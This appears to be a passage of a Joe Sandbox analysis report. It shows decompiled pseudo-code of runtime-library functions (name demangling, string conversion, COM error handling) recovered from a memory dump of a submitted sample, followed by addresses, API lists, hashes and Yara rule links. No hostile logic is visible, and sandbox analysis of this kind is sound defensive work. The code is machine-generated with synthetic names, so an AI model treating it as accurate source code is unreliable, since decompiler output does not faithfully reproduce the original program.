                      • Instruction Fuzzy Hash: F2F08B316803086FC720EF28D842FB97349AB80304F40C400F5054B2A3D778EE81CBC1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00969C10 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 38COMMONLIBRARYCODE
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E00969C10(intOrPtr _a4) {
				char _v8;
				intOrPtr _v12;
				char _v16;
				intOrPtr* _t13;
				intOrPtr _t26;
				intOrPtr _t27;

				_t13 =  *0xb30640; // 0x0
				_v8 =  *_t13;
				if(_v8 == 0) {
					E0095F350(_a4, 1);
					return _a4;
				}
				if(_v8 == 0x41) {
					_t26 =  *0xb30640; // 0x0
					_t27 = _t26 + 1;
					 *0xb30640 = _t27;
					_v16 = E00960060("{flat}", 6);
					_v12 = _t27;
					E0095F1F0(_a4,  &_v16);
					return _a4;
				}
				E0095F350(_a4, 2);
				return _a4;
			}









                      0x00969c16
                      0x00969c1d
                      0x00969c24
                      0x00969c68
                      0x00000000
                      0x00969c6d
                      0x00969c2a
                      0x00969c2e
                      0x00969c34
                      0x00969c37
                      0x00969c4c
                      0x00969c4f
                      0x00969c59
                      0x00000000
                      0x00969c5e
                      0x00969c77
                      0x00000000

                      APIs
                      • DName::DName.LIBVCRUNTIMED ref: 00969C68
                      • DName::DName.LIBVCRUNTIMED ref: 00969C77
                        • Part of subcall function 0095F350: DNameStatusNode::make.LIBVCRUNTIMED ref: 0095F3AE
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: Name$Name::$Node::makeStatus
                      • String ID: A${flat}
                      • API String ID: 3739413223-2440177573
                      • Opcode ID: acecbd3b21e9629cdc38db1043d2db1d96ccb3cd3cad549d96a7ba02ff4e980a
                      • Instruction ID: 0afe961bf85572637359f0b30ab0dd9ff0871ef9b519cd7fa927b6bd57f2185d
                      • Opcode Fuzzy Hash: acecbd3b21e9629cdc38db1043d2db1d96ccb3cd3cad549d96a7ba02ff4e980a
                      • Instruction Fuzzy Hash: E5016270944248AFDB04EF68C892B9D3BF8AFC0344F1480A5E88E5F391C6756A54D780
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0095C8D0 Relevance: 6.2, APIs: 4, Instructions: 211COMMONLIBRARYCODE
                      Download Yara Rule
                      C-Code - Quality: 64%
                      			E0095C8D0(intOrPtr _a4, intOrPtr _a8, signed int* _a12, signed int* _a16) {
				intOrPtr _v8;
				signed int _v12;
				char _v20;
				intOrPtr _v28;
				intOrPtr* _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				signed int _v48;
				intOrPtr _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t90;
				intOrPtr _t94;
				void* _t133;
				intOrPtr _t158;
				intOrPtr _t180;
				void* _t187;
				void* _t189;
				signed int _t191;
				void* _t192;

				_push(0xfffffffe);
				_push(0xa03b80);
				_push(E00959CD0);
				_push( *[fs:0x0]);
				_push(_t133);
				_push(_t189);
				_push(_t187);
				_t90 =  *0xa0600c; // 0x5d529087
				_v12 = _v12 ^ _t90;
				_push(_t90 ^ _t191);
				 *[fs:0x0] =  &_v20;
				_v28 = _t192 + 0xffffffe0;
				_v36 = 0;
				if(_a12[1] == 0 ||  *((char*)(_a12[1] + 8)) == 0 || _a12[2] == 0 && ( *_a12 & 0x80000000) == 0) {
					_t94 = 0;
				} else {
					if(( *_a12 & 0x80000000) == 0) {
						_v32 = _a8 + _a12[2] + 0xc;
					} else {
						_v32 = _a8;
					}
					_v8 = 0;
					if(( *_a12 & 0x00000080) == 0 || ( *_a16 & 0x00000010) == 0 ||  *0xb305e8 == 0) {
						_t144 =  *_a12 & 0x00000008;
						if(( *_a12 & 0x00000008) == 0) {
							if(( *_a16 & 0x00000001) == 0) {
								if(_a16[6] != 0) {
									if( *((intOrPtr*)(_a4 + 0x18)) == 0 || _v32 == 0) {
										L41:
										L009A0DE0(_t133, _t144, _t187, _t189);
									} else {
										_t144 = _a16;
										if(_a16[6] == 0) {
											goto L41;
										} else {
										}
									}
									if(( *_a16 & 0x00000004) == 0) {
										_v36 = 1;
									} else {
										_v36 = 2;
									}
								} else {
									if( *((intOrPtr*)(_a4 + 0x18)) == 0 || _v32 == 0) {
										L009A0DE0(_t133, _t144, _t187, _t189);
									}
									_v48 = _a16[5];
									_v52 = E0095B310(_a4,  *((intOrPtr*)(_a4 + 0x18)),  &(_a16[2]));
									E0095B590(_v32, _v52, _v48);
								}
							} else {
								_t148 = _a4;
								if( *((intOrPtr*)(_a4 + 0x18)) == 0 || _v32 == 0) {
									L009A0DE0(_t133, _t148, _t187, _t189);
								}
								E0095B590(_v32,  *((intOrPtr*)(_a4 + 0x18)), _a16[5]);
								if(_a16[5] == 4 &&  *_v32 != 0) {
									 *_v32 = E0095B310(_v32,  *_v32,  &(_a16[2]));
								}
							}
						} else {
							if( *((intOrPtr*)(_a4 + 0x18)) == 0 || _v32 == 0) {
								L009A0DE0(_t133, _t144, _t187, _t189);
							}
							 *_v32 =  *((intOrPtr*)(_a4 + 0x18));
							 *_v32 = E0095B310(_v32,  *_v32,  &(_a16[2]));
						}
					} else {
						_t180 =  *0xb305e8; // 0x0
						_v40 = _t180;
						_t158 = _v40;
						 *0x9d62b0();
						_v44 = _v40();
						if(_v44 == 0 || _v32 == 0) {
							L009A0DE0(_t133, _t158, _t187, _t189);
						}
						 *_v32 = _v44;
						 *_v32 = E0095B310( *_v32,  *_v32,  &(_a16[2]));
					}
					_v8 = 0xfffffffe;
					_t94 = _v36;
				}
				 *[fs:0x0] = _v20;
				return _t94;
			}

























                      0x0095c8d3
                      0x0095c8d5
                      0x0095c8da
                      0x0095c8e5
                      0x0095c8e9
                      0x0095c8ea
                      0x0095c8eb
                      0x0095c8ec
                      0x0095c8f1
                      0x0095c8f6
                      0x0095c8fa
                      0x0095c900
                      0x0095c903
                      0x0095c911
                      0x0095c940
                      0x0095c947
                      0x0095c952
                      0x0095c969
                      0x0095c954
                      0x0095c957
                      0x0095c957
                      0x0095c96c
                      0x0095c97e
                      0x0095c9ea
                      0x0095c9ed
                      0x0095ca37
                      0x0095caa0
                      0x0095caf7
                      0x0095cb0a
                      0x0095cb0a
                      0x0095caff
                      0x0095caff
                      0x0095cb06
                      0x00000000
                      0x00000000
                      0x0095cb08
                      0x0095cb06
                      0x0095cb17
                      0x0095cb22
                      0x0095cb19
                      0x0095cb19
                      0x0095cb19
                      0x0095caa2
                      0x0095caa9
                      0x0095cab3
                      0x0095cab3
                      0x0095cabe
                      0x0095cad7
                      0x0095cae6
                      0x0095caeb
                      0x0095ca39
                      0x0095ca39
                      0x0095ca40
                      0x0095ca4a
                      0x0095ca4a
                      0x0095ca61
                      0x0095ca70
                      0x0095ca92
                      0x0095ca92
                      0x0095ca94
                      0x0095c9ef
                      0x0095c9f6
                      0x0095ca00
                      0x0095ca00
                      0x0095ca0e
                      0x0095ca28
                      0x0095ca28
                      0x0095c993
                      0x0095c993
                      0x0095c999
                      0x0095c99c
                      0x0095c99f
                      0x0095c9a8
                      0x0095c9af
                      0x0095c9b9
                      0x0095c9b9
                      0x0095c9c4
                      0x0095c9de
                      0x0095c9de
                      0x0095cb29
                      0x0095cb47
                      0x0095cb47
                      0x0095cb4d
                      0x0095cb5b

                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: AdjustPointer
                      • String ID:
                      • API String ID: 1740715915-0
                      • Opcode ID: b092230e169c323f1eb0ab2c56031c41f4c8d129f11c9d33eeb62d134e4aad19
                      • Instruction ID: 66ff0367fd39458efca9530e99311efffdf0665d952666c57baa3f1f8c963d89
                      • Opcode Fuzzy Hash: b092230e169c323f1eb0ab2c56031c41f4c8d129f11c9d33eeb62d134e4aad19
                      • Instruction Fuzzy Hash: 25913EB4900209DFCB04CF99D895BAE77B5FB88306F248559EC15AB391C735EC85CBA1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 009500E0 Relevance: 6.1, APIs: 4, Instructions: 139COMMON
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E009500E0(void* __ebx, char** __ecx, void* __edi, void* __esi, short* _a4, int _a8) {
				char** _v8;
				signed int _v12;
				int _v16;
				char** _v20;
				char** _v24;
				int _v28;
				int _t54;
				char** _t55;
				long _t60;
				int _t62;
				int _t68;
				void* _t97;
				void* _t98;

				_t93 = __edi;
				_t69 = __ebx;
				_v28 = 0xcccccccc;
				_v24 = 0xcccccccc;
				_v20 = 0xcccccccc;
				_v16 = 0xcccccccc;
				_v12 = 0xcccccccc;
				_v8 = 0xcccccccc;
				_v8 = __ecx;
				if(_a4 != 0) {
					_v12 = E00995A70(_a4) + 1;
					_v16 = _v12 << 2;
					E00952DE0(__ebx, __edi, __esi, _v8, _v16,  &(_v8[1]), 0x80);
					_t98 = _t98 + 0x14;
					_t95 = _t98;
					_t54 = WideCharToMultiByte(_a8, 0, _a4, _v12,  *_v8, _v16, 0, 0);
					__eflags = _t98 - _t98;
					_t55 = E009D1520(_t54, _t98 - _t98);
					__eflags = _t55;
					if(_t55 != 0) {
						_v24 = 0;
					} else {
						_v24 = 1;
					}
					_t56 = _v24;
					_v20 = _v24;
					__eflags = _v20;
					if(_v20 != 0) {
						_t95 = _t98;
						_t60 = GetLastError();
						__eflags = _t98 - _t98;
						_t56 = E009D1520(_t60, _t98 - _t98);
						__eflags = _t56 - 0x7a;
						if(_t56 == 0x7a) {
							_t62 = WideCharToMultiByte(_a8, 0, _a4, _v12, 0, 0, 0, 0);
							__eflags = _t98 - _t98;
							_v16 = E009D1520(_t62, _t98 - _t98);
							E00952DE0(_t69, _t93, _t98, _v8, _v16,  &(_v8[1]), 0x80);
							_t98 = _t98 + 0x10;
							_t95 = _t98;
							_t68 = WideCharToMultiByte(_a8, 0, _a4, _v12,  *_v8, _v16, 0, 0);
							__eflags = _t98 - _t98;
							_t56 = E009D1520(_t68, _t98 - _t98);
							__eflags = _t56;
							if(_t56 != 0) {
								_v28 = 0;
							} else {
								_v28 = 1;
							}
							_v20 = _v28;
						}
					}
					__eflags = _v20;
					if(__eflags != 0) {
						__eflags =  &(_v8[1]);
						E00952B10(_t93,  *_v8,  &(_v8[1]), 0x80);
						_t98 = _t98 + 0xc;
						_t56 = E00942580(_t69,  *_v8, _t93, _t95);
					}
				} else {
					_t56 = _v8;
					 *_v8 = 0;
				}
				return E009D1520(_t56, _t97 - _t98 + 0x18);
			}
















                      0x009500e0
                      0x009500e0
                      0x009500ec
                      0x009500ef
                      0x009500f2
                      0x009500f5
                      0x009500f8
                      0x009500fb
                      0x009500fe
                      0x00950105
                      0x00950124
                      0x0095012d
                      0x00950144
                      0x00950149
                      0x0095014c
                      0x0095016a
                      0x00950170
                      0x00950172
                      0x00950177
                      0x00950179
                      0x00950184
                      0x0095017b
                      0x0095017b
                      0x0095017b
                      0x0095018b
                      0x0095018e
                      0x00950191
                      0x00950195
                      0x0095019b
                      0x0095019d
                      0x009501a3
                      0x009501a5
                      0x009501aa
                      0x009501ad
                      0x009501cb
                      0x009501d1
                      0x009501d8
                      0x009501ef
                      0x009501f4
                      0x009501f7
                      0x00950215
                      0x0095021b
                      0x0095021d
                      0x00950222
                      0x00950224
                      0x0095022f
                      0x00950226
                      0x00950226
                      0x00950226
                      0x00950239
                      0x00950239
                      0x009501ad
                      0x0095023c
                      0x00950240
                      0x0095024a
                      0x00950254
                      0x00950259
                      0x0095025c
                      0x0095025c
                      0x00950107
                      0x00950107
                      0x0095010a
                      0x0095010a
                      0x0095026f

                      APIs
                      • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,?,00000000,00000000,?,?,?,?,?,00947521,?,5D529087), ref: 0095016A
                      • GetLastError.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,00947521), ref: 0095019D
                      • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 009501CB
                      • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,00000000,?,00000000,00000000,?,?,00000000,00000000), ref: 00950215
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: ByteCharMultiWide$ErrorLast
                      • String ID:
                      • API String ID: 1717984340-0
                      • Opcode ID: 15fcd9efc92cb95e3dfb015b50c2c517b29b142c5a89da95cb890a7c6b1c5e38
                      • Instruction ID: 2d4e4406eaa9674519fd3de6c588e8098b8aaa1d3dff30cb291373180e3f65e0
                      • Opcode Fuzzy Hash: 15fcd9efc92cb95e3dfb015b50c2c517b29b142c5a89da95cb890a7c6b1c5e38
                      • Instruction Fuzzy Hash: 8E512DB5E00208BFDB10DF99D886BAEB7B4AF88301F208159F915AB380D7759E44CBD1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 009AD130 Relevance: 6.1, APIs: 4, Instructions: 100COMMONLIBRARYCODE
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E009AD130(signed short* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t39;
				void* _t40;
				signed short* _t79;

				if(_a4 != 0) {
					_t79 = _a4;
					__eflags =  *_t79 & 0x0000ffff;
					if(( *_t79 & 0x0000ffff) != 0) {
						_t65 = _a12;
						_v8 = E009AE5E0(_a12, _a16, _a4, 0, 0);
						__eflags = _v8;
						if(_v8 != 0) {
							__eflags = _v8 - E009AE9C0(_a8);
							if(__eflags <= 0) {
								L12:
								_t39 = E009AE9C0(_a8);
								_t40 = E009AEA70(_a8);
								_t70 = _a12;
								_v20 = E009AE5E0(_a12, _a16, _a4, _t40, _t39);
								__eflags = _v20;
								if(_v20 != 0) {
									L009AEF70(_a8, _v20 - 1);
									__eflags = 0;
									return 0;
								}
								L00992F10(_t70, GetLastError());
								return  *((intOrPtr*)(L00992F70(_t70)));
							}
							_v16 = E009AE7A0(_a8, __eflags, _v8);
							__eflags = _v16;
							if(_v16 == 0) {
								goto L12;
							}
							return _v16;
						}
						L00992F10(_t65, GetLastError());
						return  *((intOrPtr*)(L00992F70(_t65)));
					}
					__eflags = E009AE9C0(_a8);
					if(__eflags != 0) {
						L6:
						 *((char*)(E009AEA70(_a8))) = 0;
						L009AEF70(_a8, 0);
						return 0;
					}
					_v12 = E009AE7A0(_a8, __eflags, 1);
					__eflags = _v12;
					if(_v12 == 0) {
						goto L6;
					}
					return _v12;
				}
				E009AEEF0(_a8);
				return 0;
			}










                      0x009ad13c
                      0x009ad155
                      0x009ad15c
                      0x009ad15e
                      0x009ad1b8
                      0x009ad1c0
                      0x009ad1c3
                      0x009ad1c7
                      0x009ad1e9
                      0x009ad1ec
                      0x009ad208
                      0x009ad20b
                      0x009ad214
                      0x009ad222
                      0x009ad22a
                      0x009ad22d
                      0x009ad231
                      0x009ad255
                      0x009ad25a
                      0x00000000
                      0x009ad25a
                      0x009ad23a
                      0x00000000
                      0x009ad247
                      0x009ad1fa
                      0x009ad1fd
                      0x009ad201
                      0x00000000
                      0x00000000
                      0x00000000
                      0x009ad203
                      0x009ad1d0
                      0x00000000
                      0x009ad1dd
                      0x009ad168
                      0x009ad16a
                      0x009ad187
                      0x009ad197
                      0x009ad1a0
                      0x00000000
                      0x009ad1a5
                      0x009ad176
                      0x009ad179
                      0x009ad17d
                      0x00000000
                      0x00000000
                      0x00000000
                      0x009ad17f
                      0x009ad141
                      0x00000000

                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 78adacbe09f17cf780341c62d7531c978b39ce6b804f061f196255aab0556df6
                      • Instruction ID: 60c88cedff788d57df167de9f10d5fc84bc586671ea517687992cc35b6c0e531
                      • Opcode Fuzzy Hash: 78adacbe09f17cf780341c62d7531c978b39ce6b804f061f196255aab0556df6
                      • Instruction Fuzzy Hash: 08310370A05108EFDB04EFA4D855BAE77B9AFC6304F108968F8269B691DB34DD40DBD0
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 009AADB0 Relevance: 6.1, APIs: 4, Instructions: 100COMMONLIBRARYCODE
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E009AADB0(signed short* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				void* _t39;
				void* _t40;

				if(_a4 != 0) {
					if(( *_a4 & 0x0000ffff) != 0) {
						_t65 = _a12;
						_v8 = E009AAFA0(_a12, _a16, _a4, 0, 0);
						if(_v8 != 0) {
							if(_v8 <= E009AB130(_a8)) {
								L12:
								_t39 = E009AB130(_a8);
								_t40 = E009AB150(_a8);
								_t70 = _a12;
								_v20 = E009AAFA0(_a12, _a16, _a4, _t40, _t39);
								if(_v20 != 0) {
									E009AB1D0(_a8, _v20 - 1);
									return 0;
								}
								L00992F10(_t70, GetLastError());
								return  *((intOrPtr*)(L00992F70(_t70)));
							}
							_v16 = E009AB0A0(_a8, _v8);
							if(_v16 == 0) {
								goto L12;
							}
							return _v16;
						}
						L00992F10(_t65, GetLastError());
						return  *((intOrPtr*)(L00992F70(_t65)));
					}
					if(E009AB130(_a8) != 0) {
						L6:
						 *((char*)(E009AB150(_a8))) = 0;
						E009AB1D0(_a8, 0);
						return 0;
					}
					_v12 = E009AB0A0(_a8, 1);
					if(_v12 == 0) {
						goto L6;
					}
					return _v12;
				}
				E009AB190(_a8);
				return 0;
			}









                      0x009aadbc
                      0x009aadde
                      0x009aae38
                      0x009aae40
                      0x009aae47
                      0x009aae6c
                      0x009aae88
                      0x009aae8b
                      0x009aae94
                      0x009aaea2
                      0x009aaeaa
                      0x009aaeb1
                      0x009aaed5
                      0x00000000
                      0x009aaeda
                      0x009aaeba
                      0x00000000
                      0x009aaec7
                      0x009aae7a
                      0x009aae81
                      0x00000000
                      0x00000000
                      0x00000000
                      0x009aae83
                      0x009aae50
                      0x00000000
                      0x009aae5d
                      0x009aadea
                      0x009aae07
                      0x009aae17
                      0x009aae20
                      0x00000000
                      0x009aae25
                      0x009aadf6
                      0x009aadfd
                      0x00000000
                      0x00000000
                      0x00000000
                      0x009aadff
                      0x009aadc1
                      0x00000000

                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 7f47387c2f6b39a5e5e281a56aa7987e959b1eabe3c99d711ca7ba1267dd5a69
                      • Instruction ID: 3242ce1f25d4d892e675ac913d0f203833615525011846fbab62e22260d52b3c
                      • Opcode Fuzzy Hash: 7f47387c2f6b39a5e5e281a56aa7987e959b1eabe3c99d711ca7ba1267dd5a69
                      • Instruction Fuzzy Hash: D3311071A0410CEFDB04EFB4D855BAE77B9AF85344F208568F8199B292DB34AD40DBD1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00954C30 Relevance: 6.1, APIs: 4, Instructions: 90COMMON
                      Download Yara Rule
                      C-Code - Quality: 55%
                      			E00954C30(void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a8, signed short _a12, intOrPtr _a16, intOrPtr _a20) {
				char _v40;
				char _v52;
				intOrPtr _v60;
				void* _v68;
				char _v72;
				void* _t36;
				intOrPtr* _t59;
				void* _t64;
				void* _t65;
				void* _t71;
				void* _t72;
				void* _t73;

				_t64 =  &_v72;
				memset(_t64, 0xcccccccc, 0x11 << 2);
				_t73 = _t72 + 0xc;
				_t65 = _t64 + 0x11;
				if(_a20 != 0) {
					__imp__#8(_a20);
					E009D1520(_a20, _t73 - _t73);
				}
				E0095AF80(_t65,  &_v40, 0, 0x20);
				_t74 = _t73 + 0xc;
				_v52 = 0xffffffff;
				_t59 =  *((intOrPtr*)( *_a4 + 0x18));
				_v60 = E009D1520( *_t59(_a4, _a8, 0x9d6390, 0x400, _a12 & 0x0000ffff, _a16, _a20,  &_v40,  &_v52), _t73 + 0xc - _t73 + 0xc);
				if(_v60 < 0) {
					_v68 = 0;
					if(E00957100( &_v40,  &_v40,  &_v68) >= 0) {
						__imp__#201(0, _v68);
						E009D1520(_t39, _t74 - _t74);
						_t59 = _v68;
						E009D1520( *((intOrPtr*)( *((intOrPtr*)( *_v68 + 8))))(_t59), _t74 - _t74);
					}
				}
				_push(_t59);
				_push(_v60);
				E009D14C0(_t71, 0x954d24);
				_pop(_t36);
				return E009D1520(_t36, _t71 - _t74 + 0x44);
			}















                      0x00954c38
                      0x00954c45
                      0x00954c45
                      0x00954c45
                      0x00954c4b
                      0x00954c53
                      0x00954c5b
                      0x00954c5b
                      0x00954c68
                      0x00954c6d
                      0x00954c70
                      0x00954ca5
                      0x00954cb1
                      0x00954cb8
                      0x00954cba
                      0x00954cd0
                      0x00954cda
                      0x00954ce2
                      0x00954cee
                      0x00954cf9
                      0x00954cf9
                      0x00954cd0
                      0x00954d01
                      0x00954d04
                      0x00954d0b
                      0x00954d10
                      0x00954d21

                      APIs
                      • VariantInit.OLEAUT32(00000000), ref: 00954C53
                      • _com_handle_excepinfo.COMSUPP ref: 00954CC9
                      • SetErrorInfo.OLEAUT32(00000000,00000000,?,00000000), ref: 00954CDA
                      • @_RTC_CheckStackVars@8.LIBCMTD ref: 00954D0B
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: CheckErrorInfoInitStackVariantVars@8_com_handle_excepinfo
                      • String ID:
                      • API String ID: 2090126287-0
                      • Opcode ID: b362a8010e04f7e6b1ba5094637bc1266de3b880133a95f5e2b0c7730ca4db7e
                      • Instruction ID: 3e7b8898482418d3b096c353ea00944f139f9a00f2eb8e1b5bed366a3d870f6b
                      • Opcode Fuzzy Hash: b362a8010e04f7e6b1ba5094637bc1266de3b880133a95f5e2b0c7730ca4db7e
                      • Instruction Fuzzy Hash: 52313C72904218ABC710EF99EC82BDEB3B9ABC8314F108219F905A7291D634AD8587D1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00966980 Relevance: 6.1, APIs: 4, Instructions: 72COMMON
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E00966980(void* __ebx, void* __edi, void* __esi, intOrPtr _a4) {
				char _v12;
				intOrPtr _v16;
				char _v20;
				char _v28;
				char _v36;
				char* _t18;
				void* _t22;
				char* _t25;
				intOrPtr _t46;
				intOrPtr _t51;
				intOrPtr _t52;
				char* _t53;

				_t18 =  *0xb30640; // 0x0
				if( *_t18 != 0) {
					E0095F270( &_v12, 0x26);
					E0095FD40( &_v12, E009675A0(__ebx, __edi, __esi, __eflags,  &_v28));
					_t22 = E0096A6C0( &_v12);
					__eflags = _t22;
					if(_t22 == 0) {
						L6:
						E0095F350(_a4, 2);
						return _a4;
					}
					_t25 =  *0xb30640; // 0x0
					__eflags =  *_t25 - 0x40;
					if( *_t25 != 0x40) {
						goto L6;
					}
					_t51 =  *0xb30640; // 0x0
					_t52 = _t51 + 1;
					 *0xb30640 = _t52;
					_v20 = E00960060("::", 2);
					_v16 = _t52;
					E0095FCA0( &_v12,  &_v20);
					E0095FD40( &_v12, E0096A1E0(__ebx, __edi, __esi,  &_v36, 0, 0));
					_t53 =  *0xb30640; // 0x0
					__eflags =  *_t53 - 0x40;
					if( *_t53 != 0x40) {
						goto L6;
					}
					_t46 =  *0xb30640; // 0x0
					 *0xb30640 = _t46 + 1;
					E0095F240(_a4,  &_v12);
					return _a4;
				}
				E0095F350(_a4, 1);
				return _a4;
			}















